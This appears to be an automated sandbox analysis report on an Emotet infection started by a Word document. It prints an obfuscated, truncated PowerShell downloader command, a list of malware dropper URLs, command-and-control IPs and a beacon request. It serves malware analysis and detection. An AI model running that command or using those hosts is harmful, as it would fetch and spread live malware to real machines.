      • rundll32.exe (PID: 2832 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1 MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2744 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll #1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 912 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bjbj\rqtl.dgq',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Frxh\ggkviq.cnk',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2480 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zgwl\aiycp.wss',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cqxs\necppp.cgm',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2804 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxpl\fwcrxow.muo',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2956 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pnjy\rwrr.fge',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2264 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qaqt\yasnhb.kgm',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2240 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hudb\deul.ebq',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2412 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ohxf\pnwx.dib',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 600 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpux\rkm.xqv',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 2432 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oxtv\rmjj.sjq',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 552 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pwzo\iducd.mjn',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                  • rundll32.exe (PID: 1840 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfwk\bavnhqr.pvy',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                    • rundll32.exe (PID: 2788 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dbsb\hxixh.nee',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                      • rundll32.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvvm\ving.mzt',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                        • rundll32.exe (PID: 2840 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Puve\yoqqjfh.eoi',RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2107396520.00000000001C0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    0000000F.00000002.2110398368.00000000001A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000014.00000002.2116797461.0000000000241000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000007.00000002.2096970876.00000000002C1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000013.00000002.2115599459.00000000001D1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            19.2.rundll32.exe.1d0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              22.2.rundll32.exe.140000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                23.2.rundll32.exe.190000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  14.2.rundll32.exe.2c0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    21.2.rundll32.exe.1a0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 46 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: POwersheLL -w hidden -ENCOD IAAkAEUAMwBTAHkAIAAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA0AH0AewAzAH0AewAwAH0AewAxAH0AewA1AH0AewAyAH0AIgAtAGYAJwBNAC4ASQBvAC4ARAAnACwAJwBpAFIAZQAnACwAJwBUAE8AUgBZACcALAAnAFMAdABlACcALAAnAHMAeQAnACwAJwBDACcAKQAgADsAIAAgAFMAZQBUAC0ASQBUAEUATQAgAFYAQQBSAEkAYQBiAEwARQA6AGkANwBSAHAAVgB6ACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADYAfQB7ADMAfQB7ADcAfQB7ADUAfQAiAC0AZgAgACcARQBUAC4AUwBlAFIAVgBpACcALAAnAFMAJwAsACcAVABFAG0ALgBOACcALAAnAEkATgBUACcALAAnAHkAUwAnACwAJwBBAG4AQQBnAEUAcgAnACwAJwBDAGUAUABvACcALAAnAE0AJwApACkAIAAgADsAJABYAHMAZQBqAGoAbwBvAD0AKAAnAE4AJwArACgAJwBhAHYAYwAnACsAJwBsAGcAJwApACsAJwB1ACcAKQA7ACQAUwBsAGYAcgAxAGcAcAA9ACQAUgBwAGIANQA2AHQANAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVQA5AG4AeQBiAGoAcwA7ACQAVwB3AHUAaABjAGYAcwA9ACgAKAAnAFUAXwBtACcAKwAnADQAawAnACkAKwAnAHAAcQAnACkAOwAgACAAKABnAEUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACAAZQAzAHMAWQAgAC0AdgBBAGwAVQBlAE8AbgAgACkAOgA6ACIAQwBSAGUAYQBUAEUARABpAHIAZQBgAGMAYABUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWQAnACsAJwBiACcAKwAnAHMAUgAnACsAKAAnAGcAMAA2ADQAJwArACcANgByAFkAYgBzACcAKwAnAFEAJwArACcAOQAnACkAKwAoACcAMAB4AG0AJwArACcAcgBxACcAKwAnAFkAYgAnACkAKwAnAHMAJwApACAAIAAtAFIARQBQAGwAYQBDAGUAIAAoACcAWQAnACsAJwBiAHMAJwApACwAWwBjAEgAQQByAF0AOQAyACkAKQA7ACQASwAzADAAOQBxAHcAMQA9ACgAKAAnAFIAcQAnACsAJwByAG0AJwApACsAKAAnAGIAMgAnACsAJwA4ACcAKQApADsAIAAoACAATABzACAAIAB2AGEAcgBpAEEAYgBsAGUAOgBpADcAcgBQAHYAWgAgACkALgB2AGEATABVAGUAOgA6ACIAUwBFAGMAVQByAGkAYABUAFkAcABSAG8AYABUAE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQATgBtAGgAMQB3AG0AZgA9ACgAKAAnAFgAMwBiADYAJwArACcAZwAnACkAKwAnAGEAJwArACcAbwAnACkAOwAkAE8AagB6AF8AdwBhADcAIAA9ACAAKAAnAE0AJwArACgAJwA4AGoAawBsACcAKwAnAHYANAAnACkAKQA7ACQAWABnAHQAdwB6AGcAaAA9ACgAKAAnAEMAYwAnACsAJwBrADAAaAAnACkAKwAnADEANgAnACkAOwAkAFEAcQBhAHkAdQA2AGgAPQAoACcAQgAnACsAKAAnAGUANgAnACsAJwBmACcAKQArACgAJwByACcAKwAnAHcAMAAnACkAKQA7ACQASgBkAGcAegBhADUAbwA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFIAZwAwADYANAA2AHIAJwArACcAewAnACsAJwAwAH0AUQA5ADAAJwArACcAeABtAHIAcQB7ACcAKwAnADAAfQAnACkAIAAtAEYAIAAgAFsAQwBoAEEAUgBdADkAMgApACsAJABPAGoAegBfAHcAYQA3ACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQATgAwADUAcQA1AHQANQA9ACgAJwBPACcAKwAoACcAXwAnACsAJwAzACcAKwAnAGUAMgBwAGYAJwApACkAOwAkAEcAawBoAG0AMQB0AGcAPQBuAGUAVwAtAE8AYgBgAGoAYABFAEMAVAAgAE4AZQBUAC4AVwBFAEIAQwBsAGkAZQBOAHQAOwAkAEoAawBkAHkAcwAwAG8APQAoACgAKAAoACcAaAB0ACcAKwAnAHQAJwArACcAcAA6AEoAJwArACcAKQAoADMAcwAyACkAJwApACkAKwAoACcAKAAnACsAJwBKACkAKAAzAHMAMgAnACsAJwApACcAKQArACgAKAAnACgAegBoACcAKwAnAG8AJwApACkAKwAoACcAbgBnAHMAJwArACcAaAAnACsAJwBpAHgAaQBuAGcAYwAnACsAJwBoAHUAYQAnACkAKwAoACcAbgAnACsAJwBnAC4AJwApACsAJwBjACcAKwAnAG8AbQAnACsAKAAoACcASgApACgAMwBzADIAJwArACcAKQAnACkAKQArACcAKAAnACsAJwB3AHAAJwArACgAJwAtACcAKwAnAGEAZABtAGkAbgBKACcAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAnACsAJwAyACkAJwApACkAKwAoACgAJwAoAE8AVABtAEoAJwArACcAKQAoACcAKwAnADMAcwAnACsAJwAyACkAKABAACcAKQApACsAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoASgAnACkAKwAoACgAJwApACcAKwAnA

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://dagranitegiare.com/wp-admin/jCH/Avira URL Cloud: Label: malware
                      Source: https://dagranitegiare.com/wp-admin/jCH/PAvira URL Cloud: Label: malware
                      Source: http://zhongshixingchuang.com/wp-admin/OTm/Avira URL Cloud: Label: malware
                      Source: http://koreankidsedu.com/wp-content/2cQTh/Avira URL Cloud: Label: malware
                      Source: http://www.greaudstudio.com/docs/FGn/Avira URL Cloud: Label: malware
                      Source: https://dagranitegiare.comAvira URL Cloud: Label: phishing
                      Source: http://geoffoglemusic.com/wp-admin/x/Avira URL Cloud: Label: malware
                      Source: https://suriagrofresh.com/serevers/MVDjI/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: dagranitegiare.comVirustotal: Detection: 8%Perma Link
                      Source: https://dagranitegiare.com/wp-admin/jCH/Virustotal: Detection: 16%Perma Link
                      Source: http://zhongshixingchuang.com/wp-admin/OTm/Virustotal: Detection: 15%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dllReversingLabs: Detection: 93%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Info.docVirustotal: Detection: 69%Perma Link
                      Source: Info.docReversingLabs: Detection: 56%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dllJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 45.119.81.203:443 -> 192.168.2.22:49165 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095683883.0000000001E27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095755658.0000000002080000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: dagranitegiare.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.119.81.203:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.119.81.203:443

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49168 -> 184.66.18.83:80
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://zhongshixingchuang.com/wp-admin/OTm/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://www.greaudstudio.com/docs/FGn/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://koreankidsedu.com/wp-content/2cQTh/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://expeditionquest.com/X/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: https://suriagrofresh.com/serevers/MVDjI/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: http://geoffoglemusic.com/wp-admin/x/
                      Source: powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in memory: https://dagranitegiare.com/wp-admin/jCH/
                      Source: Joe Sandbox ViewIP Address: 167.71.148.58 167.71.148.58
                      Source: Joe Sandbox ViewIP Address: 202.187.222.40 202.187.222.40
                      Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                      Source: Joe Sandbox ViewASN Name: TTNET-MYTIMEdotComBerhadMY TTNET-MYTIMEdotComBerhadMY
                      Source: Joe Sandbox ViewASN Name: LVSS-AS-VNLongVanSystemSolutionJSCVN LVSS-AS-VNLongVanSystemSolutionJSCVN
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: global trafficHTTP traffic detected: POST /6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ HTTP/1.1DNT: 0Referer: 167.71.148.58/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/Content-Type: multipart/form-data; boundary=----------------------ObDr1IOf89xfNboPuN6RXhUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 6868Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 45.119.81.203:443 -> 192.168.2.22:49165 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.66.18.83
                      Source: unknownTCP traffic detected without corresponding DNS query: 184.66.18.83
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.187.222.40
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: unknownTCP traffic detected without corresponding DNS query: 167.71.148.58
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB48CD7-B28F-4AE5-86AD-026C320EA73C}.tmpJump to behavior
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2095525854.00000000003C7000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: dagranitegiare.com
                      Source: unknownHTTP traffic detected: POST /6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/ HTTP/1.1DNT: 0Referer: 167.71.148.58/6nxx5oih3i78uw7qh7/m4898/4op628cd88c/ji50i68zs1/i9hmqo/Content-Type: multipart/form-data; boundary=----------------------ObDr1IOf89xfNboPuN6RXhUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 167.71.148.58:443Content-Length: 6868Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000002.2104542311.000000001B568000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2104585609.000000001B59D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000002.2104573649.000000001B57F000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2095550087.0000000000414000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000002.2104386508.000000001B4E0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in binary or memory: http://expeditionquest.com/X/
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in binary or memory: http://geoffoglemusic.com/wp-admin/x/
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2105210846.000000001CCC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100613650.0000000001B60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097379165.0000000002060000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2099147774.0000000001E80000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2097330160.0000000002F92000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100437393.0000000003B3C000.00000004.00000001.sdmpString found in binary or memory: http://koreankidsedu.com/wp-content/2cQTh/
                      Source: powershell.exe, 00000005.00000002.2106134219.000000001CEA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2101263831.0000000001D47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097603957.0000000002247000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.2111902319.0000000002207000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
